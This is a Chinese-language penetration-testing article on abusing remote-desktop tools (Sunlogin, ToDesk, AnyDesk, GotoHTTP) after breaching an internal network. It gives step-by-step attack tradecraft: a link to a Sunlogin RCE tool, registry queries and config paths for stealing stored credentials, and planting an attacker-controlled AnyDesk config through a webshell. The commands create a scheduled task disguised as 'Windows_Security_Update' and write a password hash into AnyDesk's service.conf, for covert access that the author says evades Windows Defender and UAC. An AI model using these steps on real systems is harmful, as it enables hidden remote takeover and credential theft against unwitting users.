內網滲透之遠程控制軟件利用總結！

0x00 前言

在內網滲透過程中，會碰到遠程控制soft或者其他，這里針對遠程控制軟件做如下總結。

0x01 向日葵

向日葵（可以攻擊）

針對向日葵的話其實如果有本地安裝的話，是有可能存在漏洞的。這里進行復現

向日葵個人版for Windows <= 11.0.0.33  向日葵簡約版 <= V1.0.1.43315（2021.12）  測試客戶端漏洞版本:11.0.0.33162

攻擊過程：

tasklist查看是否有sunlogin的進程直接用golang的工具來進行攻擊即可https://github.com/Mr-xn/sunlogin_rce

向日葵（不可以攻擊）

遇到不可以攻擊的向日葵，我們也有幾種滲透手法：

(1) 竊取配置文件來進行解密（低版本 版本號具體未知）

低版本的向日葵把密碼和機器碼加密寫入到了配置文件中，我們可以把配置文件down到自己的機器上，然后進行重開向日葵即可。這里向日葵版本較低，就不進行測試

(2) 在12.5.2之前的某些版本可以寫到了注冊表中，所以可以使用注冊表來進行查詢

reg query HKEY\\\_USERS\\\\.DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginInforeg query HKEY\\\_USERS\\\\.DEFAULT\\\\Software\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\SunloginGreenInfo

向日葵默認配置文件路徑:  

安裝版：C:\\\\Program Files\\\\Oray\\\\SunLogin\\\\SunloginClient\\\\config.ini    便攜版：C:\\\\ProgramData\\\\Oray\\\\SunloginClient\\\\config.ini    本機驗證碼參數：encry\\\_pwd    本機識別碼參數：fastcode(去掉開頭字母)    sunlogincode：判斷用戶是否登錄狀態

在向日葵高于12.5.3.*的已經沒有辦法獲取secert了

0x02 todesk

常見滲透方式（偷配置，百試百靈）

這里還是和前面的向日葵一樣，可以進行配置文件的竊取，默認安裝路徑C:\Program Files\ToDesk\config.ini

這里咱們可以攻擊機安裝todesk，然后讀取到config.ini中的配置文件，然后和攻擊機進行替換即可。

這里我虛擬機假裝是受害機，讀取出來，然后攻擊機把tempauthpassex進行替換。

本機下載todesk進行替換。

兩個機器密碼相同（進行替換的時候需要修改攻擊機密碼更新頻率）

0x03 anydesk

anydesk的配置文件在以下文件中，而通常這個時候我們有權限修改anydesk的配置文件。

C:\\Users\\用戶名\\AppData\\Roaming\\AnyDesk

這里進行測試，起兩個虛擬機，設定一個場景（攻擊機拿到了webshell，受害機開著windows defender，如何去滲透拿到受害機權限）

攻擊機ip: 10.211.55.3 + 10.211.55.2受害機ip: 10.211.55.4（windows defender全開）

情景復現1

這里拿到了受害機的webshell，是個普通權限，無法去關閉

這里可以看到有windows defender來運行，這里無法進行關閉windows defender

這里用powershell執行遠程命令下載anydesk到用戶的目錄中去，因為虛擬機只有C盤，所以創建了一個目錄來存放，在真實的滲透過程中，一般是有RWE的目錄

上傳上去之后，先不去打開。轉到攻擊機進行操作

(1) 這里先去給攻擊機下載anydesk（如果下載過的小伙伴，要先清除之前的配置文件），沒有的就不用看這一步，清除結束后如下

(2) 這里打開攻擊機的anydesk，牢記我此處勾選的id，然后點擊右上角的概述-->為自主訪問設置密碼-->設置一個密碼（這里設置為Q16G666!!）--->之后點擊應用，攻擊機完全退出anydesk（小托盤也要退出），并且退出時不選擇安裝anydesk。

(3) 攻擊機完全退出anydesk（小托盤也要退出），這里還是到配置文件路徑下 把文件復制下來。是我圖中勾選的這四個。復制完成之后，攻擊機將文件進行刪除。

復制下來之后，給受害機的當前用戶（拿到權限的用戶）找到anydesk配置文件路徑并且復制到其他（如果沒有配置文件路徑則進行創建），一定要注意這里攻擊機復制完之后，一定要將攻擊機中的配置文件進行刪除。

(4) 重新打開攻擊機，生成配置文件，啟動受害機的anydesk。

(5) 用攻擊機進行連接，這里連接的id就是（2）中截圖的id，密碼就是（2）中設置的密碼即可成功無感繞過windows defender

情景復現2（計劃任務）

(1) 確定用戶創建計劃任務

如果命令行不能去執行，則可以去創建計劃任務去執行，例如，必須先確定當前用戶，在當前用戶的目錄下執行anydesk

powershell "(((Get-WmiObject -Class Win32\_Process -Filter 'Name=\\"explorer.exe\\"').GetOwner().user) -split '\')\[0\]schtasks /Create /TN Windows\_Security\_Update /SC monthly /tr "C:\\Users\\testuser.G1TS\\Desktop\\anydesk.exe" /RU 用戶名

執行計劃任務

schtasks /run /tn Windows\_Security\_Update

后續步驟和上面相同

然后添加密碼到配置文件中去即可。

echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\Users\用戶目錄\AppData\Roaming\AnyDesk\service.confecho ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a >> C:\Users\用戶目錄\AppData\Roaming\AnyDesk\service.conf

然后查看用戶的id

type C:\Users\用戶名\AppData\Roaming\AnyDesk\system.conf

連接即可

優點：

整個過程都不需要進行UAC彈窗，真正實現了無感繞過

缺點：

(1) 會彈出anydesk的界面，導致一些問題

(2) 啟動anydesk的權限需要桌面用戶權限，比如，IIS做了中間件環境，拿到的webshell一般都是沒有桌面用戶權限，如果啟動anydesk是不會成功的。

0x04 gotohttp

gotohttp在我的滲透測試過程中，是一個常見的方式，給我的感覺，即用即連，瀏覽器連接，方便快捷。但是缺點就是權限劃分明確，普通用戶權限起的gotohttp無法進行管理員權限操作，比如關閉windows defender和其他一些行為，不過在規避殺軟這兒也有奇效。

復現過程

普通用戶上去之后只能用普通用戶權限，這里下載對應的gotohttp上傳上去，命令行運行他，直接在當前目錄下生成配置文件，讀取配置文件，即可成功連接。

https://gotohttp.com/

因為是普通用戶啟動的，這里如果嘗試關閉windows defender，是無法進行點擊的。